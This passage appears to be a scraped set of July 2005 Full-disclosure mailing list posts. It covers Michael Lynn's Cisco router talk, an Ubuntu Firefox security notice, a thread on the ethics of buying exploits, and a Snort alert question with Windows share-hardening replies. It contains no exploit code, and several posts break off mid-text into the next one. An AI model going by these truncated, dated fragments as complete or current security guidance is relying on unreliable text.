overflow or a heap overflow, two types of memory vulnerabilities. He
demonstrated the attack using a vulnerability that Cisco fixed in April. While
that flaw is patched, he stressed that the attack can be used with any new
buffer overrun or heap overflow, adding that running code on a router is a
serious threat.

"When you attack a host machine, you gain control of that machine--when you
control a router, you gain control of the network," Lynn said.

ISS disavowed any foreknowledge of Lynn's intent to resign and present his
findings.

Cisco condemned the talk in strong terms that suggested the company may
initiate legal action against the researcher and the conference, describing
the presentation as the illegal publication of proprietary material.

"It is especially regretful, and indefensible, that the Black Hat Conference
organizers have given Mr. Lynn a platform to publicly disseminate the
information he illegally obtained," the company said in a statement. "We
appreciate the cooperation we have received from ISS in this matter. We are
working with ISS to continue our joint research in the area of security
vulnerabilities."

For his part, Black Hat Conference organizer and founder Jeff Moss denied that
he had any idea of Lynn's intent.

"He told me yesterday that he would do his backup presentation," Moss said
after the controversial presentation. Moss said he had worked hard to address
Cisco's concerns with the original presentation. "We were in the middle of
trying to run a conference and lawyers from Cisco were talking about a
temporary restraining order."

The controversy is the lat
[Full-disclosure] [USN-149-3] Ubuntu 4.10 update for Firefox vulnerabilities
===
Ubuntu Security Notice USN-149-3                               July 28, 2005
mozilla-firefox vulnerabilities
CAN-2004-1156, CAN-2004-1381, CAN-2005-0141, CAN-2005-0142, CAN-2005-0143,
CAN-2005-0144, CAN-2005-0145, CAN-2005-0146, CAN-2005-0147, CAN-2005-0150,
CAN-2005-0230, CAN-2005-0231, CAN-2005-0232, CAN-2005-0233, CAN-2005-0255,
CAN-2005-0399, CAN-2005-0401, CAN-2005-0402, CAN-2005-0578, CAN-2005-0584,
CAN-2005-0585, CAN-2005-0586, CAN-2005-0587, CAN-2005-0588, CAN-2005-0589,
CAN-2005-0590, CAN-2005-0591, CAN-2005-0592, CAN-2005-0593, CAN-2005-0752,
CAN-2005-0989, CAN-2005-1153, CAN-2005-1154, CAN-2005-1155, CAN-2005-1156,
CAN-2005-1157, CAN-2005-1158, CAN-2005-1159, CAN-2005-1160, CAN-2005-1531,
CAN-2005-1532, CAN-2005-1937, CAN-2005-2260, CAN-2005-2261, CAN-2005-2262,
CAN-2005-2263, CAN-2005-2264, CAN-2005-2265, CAN-2005-2266, CAN-2005-2267,
CAN-2005-2268, CAN-2005-2269, CAN-2005-2270
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

mozilla-firefox
mozilla-firefox-locale-ca
mozilla-firefox-locale-de
mozilla-firefox-locale-es
mozilla-firefox-locale-fr
mozilla-firefox-locale-it
mozilla-firefox-locale-ja
mozilla-firefox-locale-nb
mozilla-firefox-locale-pl
mozilla-firefox-locale-tr
mozilla-firefox-locale-uk

The problem can be corrected by upgrading the affected package to version
1.0.6-0ubuntu0.0.1 (mozilla-firefox) and 1.0.6-0ubuntu0.1
(mozilla-firefox-locale-... packages).

Please note that the new version does not work with the already existing
translation packages (mozilla-firefox-locale-...). New packages have been
provided which are compatible with the new Firefox version of this security
update, so they need to be upgraded as well (a standard system upgrade will
take care of this). After a standard system upgrade you need to restart
Firefox to effect the necessary changes.
We apologize for the huge delay of this update; we changed our update
strategy for Mozilla products to make sure that such long delays will not
happen again.

Details follow:

USN-149-1 fixed some vulnerabilities in the Ubuntu 5.04 (Hoary Hedgehog)
version of Firefox. The version shipped with Ubuntu 4.10 (Warty Warthog) is
also vulnerable to these flaws, so it needs to be upgraded as well. Please
see

  http://www.ubuntulinux.org/support/documentation/usn/usn-149-1

for the original advisory.

This update also fixes several older vulnerabilities; some of them could be
exploited to execute arbitrary code with full user privileges if the user
visited a malicious web site. (MFSA-2005-01 to MFSA-2005-44; please see the
following web site for details:
http://www.mozilla.org/projects/security/known-vulnerabilities.html)

Source archives:
[Full-disclosure] Re: bluetooth devices list ?
http://www.mobibug.com/

Mark Sec <[EMAIL PROTECTED]>
27.07.2005 22:32
Please respond to Mark Sec <[EMAIL PROTECTED]>

To: pen-test@securityfocus.com, full-disclosure@lists.grok.org.uk,
    security-basics@securityfocus.com
cc:
Subject: bluetooth devices list ?

Alo folks

a) does anyone have the latest list of the vulnerable devices (mobile,
   devices, etc) under bluetooth? something like this (the section
   "who's vulnerable"):
   http://www.thebunker.net/security/bluetooth.htm

b) does anyone have the best mail-lists, tools, links and research about
   the vulnerabilities in bluetooth?

- Mark :-)
Re: [Full-disclosure] Our Industry Is Seriously Ethics Impaired
On Wednesday, 27 July 2005 20:15, DAN MORRILL wrote:
> I could see CERT doing this, but not 3com.

CERT is too close to US Government

--
Grisu
2B OR (NOT (2B)) = FF
Re: [Full-disclosure] Our Industry Is Seriously Ethics Impaired
On Wednesday, 27 July 2005 15:15, Adam Jones wrote:
> What exactly is wrong with this?

Look at this:
http://www.red-database-security.com/advisory/published_alerts.html

Alex informed Oracle immediately of all vulns, and they did nothing. I, as
security personnel, have to think that I am the only one in the world who
doesn't know about a vulnerability.

> I personally would rather have 3com
> buying up exploits (probably under an agreement for exclusive access)
> instead of having them sold to the highest, probably malicious,
> bidder.

You trust 3Com? Me not.

> Even if someone sells it to both there is a more reputable
> group that has the exploit and can help with mitigation.

What makes you sure that no one else finds it?

--
Grisu
2B OR (NOT (2B)) = FF
Re: [Full-disclosure] NETBIOS SMB IPC$ unicode share access
Hi,

you can try:

SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\AutoShareServer

create a dword called AutoShareServer and set its value to 0 (for a server)
OR AutoShareWks=0 (for workstations). It removes all $ (hidden) shares EXCEPT
IPC$ (need reboot)

net share ipc$ /delete
(ie in: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run)

/JA
* http://www.athias.fr - Security alerts and bulletins

----- Original Message -----
From: Ramachandrand
To: full-disclosure@lists.grok.org.uk
Sent: Thursday, July 28, 2005 9:16 AM
Subject: [Full-disclosure] NETBIOS SMB IPC$ unicode share access

Hi,

AM NEW TO SNORT KINDLY HELP ME

In my network all are 2000 & XP PCs. In that all the users' home folders were
mapped as \\servername\username$. In the server we used to create a folder and
give access to the particular user.

Recently I have installed snort and it keeps on alerting this msg:
NETBIOS SMB IPC$ unicode share access

How to stop this event, i.e. not to detect this event. Please tell me in a
brief note.

Thanks in advance.

Regards,
D.Ramachandran
Re: [Full-disclosure] Our Industry Is Seriously Ethics Impaired
J.A. Terranson wrote:

> A "reputable" company does not encourage the writing of malware for money,
> or the withholding of information from the community (FD) in exchange for
> mere personal gain.

Does it follow that you regard *all* security researchers who release PoC
exploit code as disreputable?

\a

--
Andrew Simmons
Speaking for myself only
Re: [Full-disclosure] NETBIOS SMB IPC$ unicode share access
On Thu, 28 Jul 2005, Ramachandrand wrote:

> How to stop this event, i.e. not to detect this event. Please tell me in a
> brief note

Welcome to Full Snort Assistance - N O T.

Just because I know you haven't, I'm going to ask: have you tried a Snort
users group? A Snort usenet group? *Anyone*??? Didn't think so...

--
Yours,
J.A. Terranson
[EMAIL PROTECTED]
0xBD4A95BF

"A stock broker is someone who handles your money until it's all gone."
Diana Hubbard (of Scientology fame)
Re: [Full-disclosure] NETBIOS SMB IPC$ unicode share access
> How to stop this event, i.e. not to detect this event. Please tell me in a
> brief note

man snort
[Full-disclosure] NETBIOS SMB IPC$ unicode share access
Hi,

AM NEW TO SNORT KINDLY HELP ME

In my network all are 2000 & XP PCs. In that all the users' home folders were
mapped as \\servername\username$. In the server we used to create a folder and
give access to the particular user.

Recently I have installed snort and it keeps on alerting this msg:
"NETBIOS SMB IPC$ unicode share access"

How to stop this event, i.e. not to detect this event. Please tell me in a
brief note.

Thanks in advance.

Regards,
D.Ramachandran